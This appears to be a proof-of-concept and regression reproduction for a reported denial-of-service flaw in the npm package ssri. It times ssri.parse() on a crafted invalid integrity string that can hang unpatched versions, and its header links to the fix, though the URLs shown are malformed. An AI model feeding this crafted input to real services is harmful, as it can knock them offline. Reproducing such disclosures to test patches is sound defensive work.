/**
* Package Manager: npm
* Link to published package: https:/npm/ssri
* Link to GitHub repo: https:/npm/ssri
* Severity level: High
* Module Description: ssri, short for Standard Subresource Integrity, is a Node.js utility for parsing, manipulating, serializing, generating, and verifying Subresource Integrity hashes.
* Additional Info: Parsing crafted invalid SRI strings can cause a denial of service.
* Contacted maintainer?: Yes
* patch: https:/npm/ssri/pull/17
* Open issue?: No
*/
const ssri = require('ssri')
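// Regression reproduction for the denial-of-service report in the file header:
// ssri.parse() is called in strict, single-entry mode on an invalid SRI string.
// Run it against the installed ssri version to check whether the patch linked
// in the header is present. Code that parses integrity strings from untrusted
// sources should run a release containing that patch and should cap the input
// length before parsing.

// Control input from the original script, kept for comparison:
// const integrity = 'sha512-9KhgCRIx/AmzC8xqYJTZRrnO8OW2Pxyl2DIMZSBOr0oDvtEFyht3xpp71j/r/pAe1DM+JI/A+line3jUBgzQ7A==?foo'

// Invalid SRI string from the report, kept byte-for-byte so that results stay
// comparable between library versions.
const integrity = 'sha512-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?????????????????????????????????? b'

// Non-strict variant from the original script:
// const parsed = ssri.parse(integrity)
const parseOptions = { strict: true, single: true }

// Time the parse so a regression shows up as a number rather than as a hang.
// NOTE(review): a run that does not reach console.timeEnd promptly presumably
// means the installed version is unpatched; confirm against the linked patch.
console.time('ssri.parse')
const parsed = ssri.parse(integrity, parseOptions)
console.timeEnd('ssri.parse')

// The original comments here said "=== integrity". That describes the
// round trip for a well-formed string and is not expected to hold for this
// invalid input. TODO confirm the actual output on a patched version.
ssri.stringify(parsed)
const s = parsed.toString()
console.log(s)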